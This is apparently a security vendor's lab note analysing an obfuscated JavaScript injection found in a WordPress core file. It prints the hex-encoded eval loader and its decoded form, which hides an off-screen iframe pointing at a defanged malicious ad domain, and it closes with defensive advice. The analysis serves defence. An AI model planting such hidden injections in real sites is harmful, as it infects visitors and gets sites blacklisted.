Hidden iframe Injected into WordPress core file

Labs Note

Injecting malware into core files of CMS installations is one of the techniques attackers use. From the user’s perspective, it is easier to detect and remediate such cases if they are using a File Integrity Monitoring system. On the other hand, if they are not monitoring file changes, they could be afraid of modifying such core files, therefore leaving the website infected.

During an incident response investigation, we identified the following obfuscated javascript injection in the WordPress core file “wp-includes/general-template.php”, after the _wp_render_title_tag() function:

function _wp_render_title_tag() {/*general-template.php content*/echo "<script type=\"text/javascript\">
(function(){var dazhyaft=\"\";var ybfsrany=\"77696e646f772e6f6e6c6f6164203d2066756e6374696f6e28297b
66756e6374696f6e20783232627128612c622c63297b69662863297b7661722064203d206e6577204461746528293b642e73657…
223b646f63756d656e742e626f64792e617070656e644368696c64287832326471293b7d7d\";for (var kytiafaz=0;kytiafaz<ybfsr
any.length;kytiafaz+=2){dazhyaft=dazhyaft+parseInt(ybfsrany.substring(kytiafaz,kytiafaz+2), 16)+\",\";}dazhyaft=dazh
yaft.substring(0,dazhyaft.length-1);eval(eval('String.fromCharCode('+dazhyaft+')'));})();
</script>";/*general-template.php content*/

After decoding the snippet, the resulting code shows that a hidden div element is being created and an iframe loads inadvertent ads from hxxp://css(dot)belayamorda(dot)info to be displayed to the user:

window.onload = function(){function x22bq(a,b,c){if(c){var d = new Date();d.setDate(d.getDate()+c);}
if(a && b) document.cookie = a+'='+b+(c ? '; expires='+d.toUTCString() : '');else return false;}
function x33bq(a){var b = new RegExp(a+'=([^;]){1,}');var c = b.exec(document.cookie);if(c) c = c[0].split('=');
else return false;return c[1] ? c[1] : false;}var x33dq = x33bq("981a2d4e141fa25ceb17c79b9e0ee049");
if( x33dq != "c5ba5b8128ad05ae33785022d9e5b54c"){x22bq("981a2d4e141fa25ceb17c79b9e0ee049","c5ba5b8128ad05ae33785022d9e5b54c",1);
var x22dq = document.createElement("div");var x22qq = "hxxp://css(dot)belayamorda(dot)info/megaadvertize/?IQRnEBD&
keyword=c7d84cf6c52e44cbf494014dfc02d644&DSrLnkZjqC=BSdtLdwZ&vizGGpXMTbm=NZntgCeGxhrN&
twXzSBMLVmkBdsV=filjyodeEPIQPmysLRB&;pdWAGdxIyxfw=mALvqaAUeBl&BFELVKttdIedUh=wLQEMhvAaxckLF";
x22dq.innerHTML="<div style='position:absolute;z-index:1000;top:-1000px;left:-9999px;'><iframe src='"
+x22qq+"'></iframe></div>";document.body.appendChild(x22dq);}}

As you can see the ads are hidden using the div element, they are pushed -1000px in order to be outside the screen but Google and other search engines can still see it and index it. This could be easily missed when reviewing the website if you are only looking at the live version of your website. Since the Search Engines are able to fetch the content, the site could get penalized and added into their Blacklist.

If you follow best security practices and have a monitoring integrity system in place as we mentioned in the beginning, you should be able to identify such issue and remediate it quickly by replacing the CMS core files. If you don’t, we highly recommend adding that piece into your website and a Website Firewall to prevent such issues from happening.

You May Also Like